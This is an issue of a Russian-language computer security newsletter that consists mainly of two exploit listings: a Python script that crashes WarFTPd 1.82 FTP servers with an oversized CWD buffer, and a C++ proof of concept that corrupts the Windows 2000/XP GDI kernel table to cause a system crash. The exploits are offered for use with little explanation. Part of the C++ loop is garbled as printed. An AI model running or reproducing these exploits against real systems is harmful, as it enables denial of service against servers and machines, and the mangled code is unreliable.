Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.


|
Компьютер для продвинутых пользователей
В этом выпуске:
WarFTPd 1.82.00-RC11 | Windows 2000, XP
ПО: WarFTPd 1.82.00-RC11

dos.py:
#!/usr/bin/env python
import sys
import ftplib
print "WAR_FTPD Remote Denial Of Service (DOS)"
print "Copyright (c) Joxean Koret"
print
target = "192.168.1.13"
targetPort = "21"

try:
    ftp = ftplib.FTP()
    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login() # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)
a = "%s%s"
"""
for i in range(0):
    a += a
"""
b = "AAAA"
for i in range(6):
    b += b
a = a + b
print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "
try:
    ftp.cwd(a)
except:
    print "[+] Exploit apparently works. Trying to verify it ... "
    try:
        ftp.connect(target, targetPort)
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        print "[!] Ok. Server is dead, exploit successfully executed. "

ПО: Windows
Версия: 2000, XP

GDIKernelPoC.cpp:
//  Argeniss  - Information Security - www.argeniss.com
//  
//  by: Cesar Cerrudo
//
//  Windows GDI Kernel structure vulnerability
//
//  Versions affected: Win2k sp0,sp1,sp2,sp3,sp4, WinXP sp0,sp1,sp2
//        
//
//  Note: if it doesn't work it's because the wrong section is mapped 
try changing hMapFile initial value
//         runnin this PoC will cause BSOD
//


#include "windows.h"
#include "stdio.h"

#pragma comment(lib, "user32")

typedef struct
{
   DWORD pKernelInfo;
   WORD  ProcessID;
   WORD  _nCount;
   WORD  nUpper;
   WORD  nType;
   DWORD pUserInfo;
} GDITableEntry;

typedef struct _SECTION_BASIC_INFORMATION {
  ULONG                   d000;
  ULONG                   SectionAttributes;
  LARGE_INTEGER           SectionSize;
} SECTION_BASIC_INFORMATION;

typedef DWORD (CALLBACK* NTQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);
NTQUERYSECTION NtQuerySection;

int main(int argc, char* argv[])
{
    SECTION_BASIC_INFORMATION buff;
    HANDLE hMapFile;
        hMapFile=(HANDLE)0x10;
    LPVOID lpMapAddress=NULL;
    HWND hWin;

    
hWin=CreateWindow(NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);

    while(!lpMapAddress){
        hMapFile=(void*)((int)hMapFile+1);
        lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 
0, 0);
    }

    if (lpMapAddress == NULL) {
        printf("Could not map section.");
        return 0;
    }


    HMODULE hL;
    hL=LoadLibrary("Ntdll.dll");
    NtQuerySection= (DWORD (WINAPI *)(HANDLE, DWORD, 
PVOID,DWORD,DWORD*))GetProcAddress(hL,"NtQuerySection");

    if (NtQuerySection(hMapFile,0,&buff,sizeof(buff),0)){
        printf("Could not get section size");
        return 0;
    }

char * sMap;
DWORD i;
sMap=(char*)lpMapAddress;
printf("Section size: 0x%x\n",buff.SectionSize.QuadPart);
printf("Writing to section.\nPress Ctr+C to quit\n");


GDITableEntry *gdiTable;


    gdiTable=(GDITableEntry *)lpMapAddress;
    
    for (i=0;i_nCount =0x5858;
        gdiTable->nType  =0x5858;
        gdiTable->nUpper =0x5858;
        gdiTable->ProcessID =0x5858;
        gdiTable->pKernelInfo   =0x58585858;
        gdiTable->pUserInfo   =0x58585858;
            
        gdiTable++;
    }




CloseHandle(hMapFile);

    return 0;
}

ПО: Linux
Версия: 2.6.x

GDIKernelPoC.cpp:

Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное